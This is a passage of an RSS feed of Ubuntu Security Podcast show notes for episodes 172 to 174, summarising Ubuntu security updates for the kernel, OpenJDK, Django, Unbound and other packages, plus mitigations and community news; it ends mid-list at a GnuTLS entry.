<h3 id="usn-5575-1-usn-5575-2-libxslt-vulnerabilities-05-06">[<a href="https://ubuntu.com/security/notices/USN-5575-1">USN-5575-1</a>, <a href="https://ubuntu.com/security/notices/USN-5575-2">USN-5575-2</a>] Libxslt vulnerabilities [05:06]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-30560">CVE-2021-30560</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-5815">CVE-2019-5815</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>originally reported against blink (chromium browser engine) - heap corruption
via crafted HTML</li>
<li>plus type confusion bug when handling crafted XML -&gt; heap buffer overflow as
well</li>
</ul>
<h3 id="usn-5576-1-twisted-vulnerability-05-41">[<a href="https://ubuntu.com/security/notices/USN-5576-1">USN-5576-1</a>] Twisted vulnerability [05:41]</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24801">CVE-2022-24801</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>HTTP desync - form of HTTP request smuggling</li>
<li>parsed various HTTP requests more leniently than permitted by RFC 7230 - can
then allow requests which should have been blocked and hence lead to desync if
requests pass though multiple parsers -&gt; request smuggling -&gt; access to
privileged endpoints etc</li>
</ul>
<h3 id="usn-5578-1-open-vm-tools-vulnerability-06-23">[<a href="https://ubuntu.com/security/notices/USN-5578-1">USN-5578-1</a>] Open VM Tools vulnerability [06:23]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-31676">CVE-2022-31676</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>VMWare OpenVM Tools - failed to properly check access controls on certain
requests - could then allow a local user who has non-admin access to a guest
VM to escalate privileges and gain root within the VM</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-22-dot-10-to-disable-gnome-43-s-device-security-panel-07-09">Ubuntu 22.10 To Disable GNOME 43’s ‘Device Security’ Panel [07:09]</h3>
<ul>
<li><a href="https://www.omgubuntu.co.uk/2022/08/ubuntu-22-10-device-security-panel-disabled">https://www.omgubuntu.co.uk/2022/08/ubuntu-22-10-device-security-panel-disabled</a></li>
<li>GNOME 43 (Ubuntu 22.10 / Kinetic Kudu) has as new Device Security Panel in
GNOME Control Center / Settings</li>
<li>Shows an assessment of the security of the hardware platform
<ul>
<li>HSI security levels for the host</li>
<li><a href="https://fwupd.github.io/libfwupdplugin/hsi.html">https://fwupd.github.io/libfwupdplugin/hsi.html</a></li>
<li>Designed to raise awareness of platform security issues to put pressure on
vendors to build and provide security configurations OOTB</li>
<li>LVFS analyses firmware binaries to determine how they then affect the security
of hardware platforms</li>
<li>fwupd then assesses the hardware platform settings in conjuction with the
details from LVFS for the firmware of the machine and the results can be
viewed in g-c-c</li>
<li>Includes details like:
<ul>
<li>Whether SPI memory regions are defined and locked by the BIOS</li>
<li>TPM 2.0 presence</li>
<li>UEFI platform key</li>
<li>IOMMU</li>
<li>Intel BootGuard</li>
<li>Ability to accurately reconstruct the PCR0 value from the TPM event log</li>
<li>Intel CET (<a href="/episode-79/#joe-discusses-intel-cet-with-john-johansen--aka-jj--09-28">Episode 79 - Joe discusses Intel CET with John Johansen (aka JJ)</a>)</li>
</ul>
</li>
<li>Unfortunately for most of these options, there is not a lot a user can do to
easily increase their security / get to a higher level of conformance</li>
<li>So showing this could just alarm users when there is no good action they can
take to remediate it
<ul>
<li>especially from the GUI - some of this could be done at a more low-level
but this has the chance of breaking things</li>
<li>e.g. could try and potentially recompile everything with CET enabled (this
is already done in Ubuntu for the vast majority of packages but not for
the kernel - still waiting on Intel to upstream patches required to make
this work)</li>
<li>but if you do this there is a good chance you could break your install if
you don&rsquo;t get it right</li>
</ul>
</li>
<li>Ideally if GNOME wants to display security information to the user,
especially if they want to try and increase security awareness etc, this
needs to be actionable - and be actionable from the same place as the info
is displayed - ie in g-c-c itself</li>
<li>and if g-c-c is going to then trigger steps to try and make things more
secure for the user this needs to be super robust to make sure we still
don&rsquo;t brick machines etc</li>
<li>so overall, for Ubuntu the desktop and security teams feel this is not ready
to be included for Ubuntu 22.10 in such a prominent way
<ul>
<li>users can already get the same info via fwupd already (even in Ubuntu 22.04 LTS)
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>          fwupdmgr security
</span></span></code></pre></div></li>
<li>interesting to note this shows a message:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>          The HSI specification is not yet complete. To ignore this warning, use --force
</span></span></code></pre></div></li>
<li>so even fwupd developers realise this is perhaps still not ready for prime
time</li>
</ul>
</li>
<li>So the question then as LVFS/fwupd developer Richard Hughes put it:
&ldquo;I suppose that not knowing is more secure?&rdquo;</li>
<li>And as I responded in the LP bug - at this stage yes, since currently it
would just create alarm with no easy actions for a user to take to remediate
it - since then there is a risk of DoS by say enabling secure boot when
unknowingly using unsigned drivers etc</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E174.mp3" length="12178336" type="audio/mpeg" /><itunes:duration>1005</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 173
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-173/</link>
          <pubDate>Fri, 19 Aug 2022 17:51:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>79329274187ca09e2c678e95c1f9ad44cd0a78ba6bf2d9a33256d902e5e6b3ca2559fcf2ee8c986af040dcc03cc09f4ec4ac1ee7c7798c8c52153d904fab9842</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 173</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we take a look at the recent announcement of .NET 6 for Ubuntu
  22.04 LTS, plus we cover security updates for the Linux kernel, Booth,
  WebKitGTK, Unbound and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we take a look at the recent announcement of .NET 6 for Ubuntu
  22.04 LTS, plus we cover security updates for the Linux kernel, Booth,
  WebKitGTK, Unbound and more.
  </itunes:summary>
        <description>  This week we take a look at the recent announcement of .NET 6 for Ubuntu
  22.04 LTS, plus we cover security updates for the Linux kernel, Booth,
  WebKitGTK, Unbound and more.
  </description>
        <googleplay:description>  This week we take a look at the recent announcement of .NET 6 for Ubuntu
  22.04 LTS, plus we cover security updates for the Linux kernel, Booth,
  WebKitGTK, Unbound and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we take a look at the recent announcement of .NET 6 for Ubuntu
22.04 LTS, plus we cover security updates for the Linux kernel, Booth,
WebKitGTK, Unbound and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>24 unique CVEs addressed</p>
<h3 id="usn-5562-1-linux-kernel-vulnerabilities-00-49">[<a href="https://ubuntu.com/security/notices/USN-5562-1">USN-5562-1</a>] Linux kernel vulnerabilities [00:49]</h3>
<ul>
<li>11 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-34918">CVE-2022-34918</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28893">CVE-2022-28893</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1975">CVE-2022-1975</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1974">CVE-2022-1974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1734">CVE-2022-1734</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1679">CVE-2022-1679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1652">CVE-2022-1652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1048">CVE-2022-1048</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0494">CVE-2022-0494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2586">CVE-2022-2586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2588">CVE-2022-2588</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 20.04 LTS GA etc + 18.04 HWE etc</li>
<li>3 high priority CVEs
<ul>
<li>2 of these covered in <a href="/episode-172/#usn-5557-1-linux-kernel-vulnerabilities-13-44">last week&rsquo;s episode</a> 1 in netfilter and 1 in
network packet scheduler</li>
<li>New this week is a second CVE in the netfilter subsystem - affects
kernels since 4.1 - type confusion bug leading to a buffer overflow -&gt;
code execution within the kernel and hence privilege escalation -
requires an attacker to gain <code>CAP_NET_ADMIN</code> which is privileged, <strong>but</strong>
with unprivileged user-namespaces this is trivial - so can mitigate
this by disabling unpriv userns - but this may then affect applications
like Google Chrome and others which use this to setup their sandboxes
etc</li>
</ul>
</li>
</ul>
<!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>sudo sysctl kernel.unprivileged_userns_clone<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span></code></pre></div><h3 id="usn-5564-1-linux-kernel--intel-iotg--vulnerabilities-02-32">[<a href="https://ubuntu.com/security/notices/USN-5564-1">USN-5564-1</a>] Linux kernel (Intel IoTG) vulnerabilities [02:32]</h3>
<ul>
<li>15 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-34918">CVE-2022-34918</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33981">CVE-2022-33981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29901">CVE-2022-29901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29900">CVE-2022-29900</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28893">CVE-2022-28893</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1975">CVE-2022-1975</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1974">CVE-2022-1974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1789">CVE-2022-1789</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1734">CVE-2022-1734</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1679">CVE-2022-1679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1652">CVE-2022-1652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0500">CVE-2022-0500</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2585">CVE-2022-2585</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2586">CVE-2022-2586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2588">CVE-2022-2588</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 Intel <a href="https://www.intel.com/content/www/us/en/products/docs/processors/embedded/enhanced-for-iot-platform-brief.html">IOTG</a>
<ul>
<li><a href="https://ubuntu.com/download/iot/intel-iotg">https://ubuntu.com/download/iot/intel-iotg</a></li>
<li>Atom x6000E, Pentium, Celeron N and J series processors</li>
</ul>
</li>
<li>Similar to above, but also includes a 4th high priority CVE in the POSIX
timers subsystem - UAF which could be triggered by an unpriv user -&gt;
priv esc - since kernel 5.7 only</li>
</ul>
<h3 id="usn-5566-1-linux-kernel-vulnerabilities-03-08">[<a href="https://ubuntu.com/security/notices/USN-5566-1">USN-5566-1</a>] Linux kernel vulnerabilities [03:08]</h3>
<ul>
<li>9 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-34918">CVE-2022-34918</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29901">CVE-2022-29901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29900">CVE-2022-29900</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28893">CVE-2022-28893</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1679">CVE-2022-1679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1652">CVE-2022-1652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2585">CVE-2022-2585</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2586">CVE-2022-2586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2588">CVE-2022-2588</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 public cloud optimised kernels (IBM, GCP, AWS, GKE, Azure, Oracle) +
KVM and Raspi</li>
<li>All 4 high priority CVEs mentioned above</li>
</ul>
<h3 id="usn-5565-1-linux-kernel-vulnerabilities-03-34">[<a href="https://ubuntu.com/security/notices/USN-5565-1">USN-5565-1</a>] Linux kernel vulnerabilities [03:34]</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-29901">CVE-2022-29901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29900">CVE-2022-29900</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2585">CVE-2022-2585</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2586">CVE-2022-2586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2588">CVE-2022-2588</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 22.04 LTS GA + 20.04 LTS HWE</li>
<li>POSIX timers, netfilter and network scheduler UAFs</li>
</ul>
<h3 id="usn-5567-1-linux-kernel--oem--vulnerabilities-03-48">[<a href="https://ubuntu.com/security/notices/USN-5567-1">USN-5567-1</a>] Linux kernel (OEM) vulnerabilities [03:48]</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2585">CVE-2022-2585</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2586">CVE-2022-2586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2588">CVE-2022-2588</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.17 OEM 22.04 LTS, 5.14 OEM 20.04 LTS</li>
<li>POSIX timers, netfilter and network scheduler UAFs</li>
</ul>
<h3 id="usn-5563-1-http-parser-vulnerability-04-00">[<a href="https://ubuntu.com/security/notices/USN-5563-1">USN-5563-1</a>] http-parser vulnerability [04:00]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8287">CVE-2020-8287</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>HTTP parsing library written in C by Joyent (not actively maintained
anymore either) - parses requests &amp; responses without making any
syscalls, memory allocations or buffering of data</li>
<li>Request smuggling vuln - would allow two copies of a particular header
within a HTTP message - ie. 2 <code>Transfer-Encoding</code> - but would only process
the first - could then allow the second to be misinterpreted by other
proxies etc which could then be used for a request smuggling attack</li>
</ul>
<h3 id="usn-5556-1-booth-vulnerability-05-20">[<a href="https://ubuntu.com/security/notices/USN-5556-1">USN-5556-1</a>] Booth vulnerability [05:20]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2553">CVE-2022-2553</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Ignored the <code>authfile</code> directive in its config file, allowing sites / nodes
which did not have the correct auth key to communicate with nodes that
did - oops&hellip; - upstream refactored code previously which introduced this
vuln - reverted the refactor to fix this</li>
</ul>
<h3 id="usn-5568-1-webkitgtk-vulnerabilities-05-57">[<a href="https://ubuntu.com/security/notices/USN-5568-1">USN-5568-1</a>] WebKitGTK vulnerabilities [05:57]</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-32816">CVE-2022-32816</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32792">CVE-2022-32792</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2294">CVE-2022-2294</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow in WebRTC, UI spoofing and OOB write - all able to
be triggered by a malicious website -&gt; RCE or other</li>
</ul>
<h3 id="usn-5569-1-unbound-vulnerabilities-06-22">[<a href="https://ubuntu.com/security/notices/USN-5569-1">USN-5569-1</a>] Unbound vulnerabilities [06:22]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-30699">CVE-2022-30699</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30698">CVE-2022-30698</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to properly handle delegation caching - an attacker could query
unbound just at the time when the cached delegation info is about to
expire - unbound then queries the upstream nameserver which could then
delay its response until the cache expires in unbound - when receiving
the response unbound would overwrite the now expired one - and so the
attacker can continue to do this and hence keep the rogue delegation
information in the unbound cache</li>
</ul>
<h3 id="usn-5526-2-pyjwt-regression-07-10">[<a href="https://ubuntu.com/security/notices/USN-5526-2">USN-5526-2</a>] PyJWT regression [07:10]</h3>
<ul>
<li>Affecting Jammy (22.04 LTS)</li>
<li><a href="/episode-169/#usn-5526-1-pyjwt-vulnerability-08-58">[USN-5526-1] PyJWT vulnerability [08:58]​</a> - upstream patch bumped the
package version to 2.4.0 and so when including this, the internal package
version got bumped even though the deb package version didn&rsquo;t - so would
get files installed as say 2.4.0 even though the deb is 2.3.0 which could
possibly cause a regression due to a change in path - fixed to revert
this internal package version bump</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="dot-net-6-now-available-in-ubuntu-22-dot-04-lts-07-45">.NET 6 now available in Ubuntu 22.04 LTS [07:45]</h3>
<ul>
<li><a href="https://devblogs.microsoft.com/dotnet/dotnet-6-is-now-in-ubuntu-2204/">https://devblogs.microsoft.com/dotnet/dotnet-6-is-now-in-ubuntu-2204/</a></li>
<li><a href="https://packages.ubuntu.com/jammy-updates/dotnet6"><code>dotnet6</code> package in Ubuntu</a> contains the .NET 6 SDK - so can do .NET
development on Ubuntu</li>
<li>In the future, Microsoft will share CVE info ahead of public releases
with Ubuntu so that we can release updates for the package in Ubuntu as
they become publicly known</li>
<li>Also includes new &lsquo;chiseled&rsquo; containers - ultra-slimmed down docker
containers to provide just the minimum needed - think of it as the
Canonical version of distroless containers.</li>
<li>results in a 100MB saving in container size whilst still providing
everything that is needed
<ul>
<li>Similar in size to Alpine containers (Chiseled Ubuntu 22.04 <code>aspnet</code>
<code>104MB</code> cf. <code>apsnet:6.0-alpine</code> <code>100MB</code>)</li>
<li>Alpine has traditionally been praised for their minimal size, but use a
different libc (<code>musl</code>) and has other differences too</li>
<li>So can now get the benefit of a familiar Ubuntu container environment
that you know and love along with the benefits of a super small
container image (including things like decreased attack surface etc)</li>
</ul>
</li>
<li>Also includes the benefit of a secure supply chain from Canonical direct
to Microsoft so that the provenance of Ubuntu-based .NET images is
known - instead of previously where these were pulled from Dockerhub
<ul>
<li>And in the future will include signed images as well so that consumers
of these images can also verify them too</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E173.mp3" length="9249799" type="audio/mpeg" /><itunes:duration>717</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 172
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-172/</link>
          <pubDate>Fri, 12 Aug 2022 17:31:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>0f3392e5f2a5a11c71fc38dd4601ca9855c0ca8dd700560caa5cb4b806481721e8fd0bea4d5366ffbcb9127556528cfd762021456b23a90a41a0679cf7524051</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 172</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Finally, Ubuntu 22.04.1 LTS is released and we look at how best to upgrade,
  plus we cover security updates for NVIDIA graphics drivers, OpenJDK,
  Django, libxml, the Linux kernel and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Finally, Ubuntu 22.04.1 LTS is released and we look at how best to upgrade,
  plus we cover security updates for NVIDIA graphics drivers, OpenJDK,
  Django, libxml, the Linux kernel and more.
  </itunes:summary>
        <description>  Finally, Ubuntu 22.04.1 LTS is released and we look at how best to upgrade,
  plus we cover security updates for NVIDIA graphics drivers, OpenJDK,
  Django, libxml, the Linux kernel and more.
  </description>
        <googleplay:description>  Finally, Ubuntu 22.04.1 LTS is released and we look at how best to upgrade,
  plus we cover security updates for NVIDIA graphics drivers, OpenJDK,
  Django, libxml, the Linux kernel and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Finally, Ubuntu 22.04.1 LTS is released and we look at how best to upgrade,
plus we cover security updates for NVIDIA graphics drivers, OpenJDK,
Django, libxml, the Linux kernel and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>52 unique CVEs addressed</p>
<h3 id="usn-5547-1-nvidia-graphics-drivers-vulnerabilities-00-43">[<a href="https://ubuntu.com/security/notices/USN-5547-1">USN-5547-1</a>] NVIDIA graphics drivers vulnerabilities [00:43]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-31608">CVE-2022-31608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-31615">CVE-2022-31615</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-31607">CVE-2022-31607</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Local priv-esc by user with basic capabilities (?) - likely memory
corruption since apparently could also DoS, perform data tampering and
info leaks</li>
<li>Also NULL ptr deref in kernel driver able to be triggered from &ldquo;local
user with basic capabilities&rdquo; -&gt; DoS</li>
<li>Also shipped a DBus configuration for the <a href="https://download.nvidia.com/XFree86/Linux-x86_64/510.60.02/README/dynamicboost.html">Dynamic Boost component</a> - this
is a system wide power controller which manages CPU and GPU power basd on
overall system workload to get best system performance per watt -
according to upstream documentation. Is only active when on AC power.
<ul>
<li>Is not enabled by default but shipped a DBus policy file that allowed
any process to communicate with the nvidia-powerd server and hence to
perform privileged actions through it</li>
</ul>
</li>
</ul>
<h3 id="usn-5546-1-usn-5546-2-openjdk-vulnerabilities-03-09">[<a href="https://ubuntu.com/security/notices/USN-5546-1">USN-5546-1</a>, <a href="https://ubuntu.com/security/notices/USN-5546-2">USN-5546-2</a>] OpenJDK vulnerabilities [03:09]</h3>
<ul>
<li>10 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-34169">CVE-2022-34169</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21549">CVE-2022-21549</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21541">CVE-2022-21541</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21540">CVE-2022-21540</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21496">CVE-2022-21496</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21476">CVE-2022-21476</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21443">CVE-2022-21443</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21434">CVE-2022-21434</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21426">CVE-2022-21426</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21449">CVE-2022-21449</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>openjdk-8,11,17 for Ubuntu 18.04, 20.04 &amp; 22.04 LTS</li>
<li>openjdk-8 for Ubuntu 16.04 ESM</li>
<li>Most interesting is <a href="https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/">&ldquo;Psychic Signatures&rdquo;</a> bug - described even in the
upstream advisory as an &ldquo;easily exploitable vuln&rdquo;, where an attacker
could forge certain SSL certificates (ie ones using ECDSA signatures) and
hence allow them to intercept or modify communications without being
detected.</li>
<li>When adding support for validating ECDSA signatures, failed to check the
provided signature values were not zero - a signature consists of two
values, <code>r</code> and <code>s</code> and these are used to then perform a bunch of
calculations to check it is valid - this involves comparing <code>r</code> against <code>r</code>
multiplied by a value derived from <code>s</code> - so if <code>r</code> and <code>s</code> are both zero you
effectively check <code>0 = 0</code></li>
<li>Affects anything which uses ECDSA signatures - including signed JWTs,
SAML assertions, WedAuthn messages etc</li>
<li>This only affected openjdk 15 though 18 since this code was rewritten in
native Java (previously was C++ which was not vulnerable) for Java 15 -
so for Ubuntu this is openjdk-17 only which is not the default JRE
(openjdk-11 is)</li>
</ul>
<h3 id="usn-5549-1-django-vulnerability-06-16">[<a href="https://ubuntu.com/security/notices/USN-5549-1">USN-5549-1</a>] Django vulnerability [06:16]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-36359">CVE-2022-36359</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible &ldquo;Reflected File Download&rdquo; attack - attack type first detailed at
BH Euroe in 2014 - causes a web application to &ldquo;virtually&rdquo; download a file from a
trusted domain - which then can get executed since is trusted</li>
<li>Usually involves the application failing to validate input such that an
attacker can craft header content to get reflected into the response
body - this is then the contents for a file, as well as get some content
injected in the resulting filename - and then cause the response to be
downloaded which will</li>
<li>In this case, if a Django application was setting the <code>Content-Disposition</code>
header of a <code>FileResponse</code> object based on a filename which is derived from
user input - fixed to escape the filename so can&rsquo;t then inject content
into the <code>Content-Disposition</code> header</li>
</ul>
<h3 id="usn-5550-1-gnutls-vulnerabilities-07-55">[<a href="https://ubuntu.com/security/notices/USN-5550-1">USN-5550-1</a>] GnuTLS vulnerabilities [07:55]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2509">CVE-2022-2509</a> <!-- raw HTML omitted --></li>
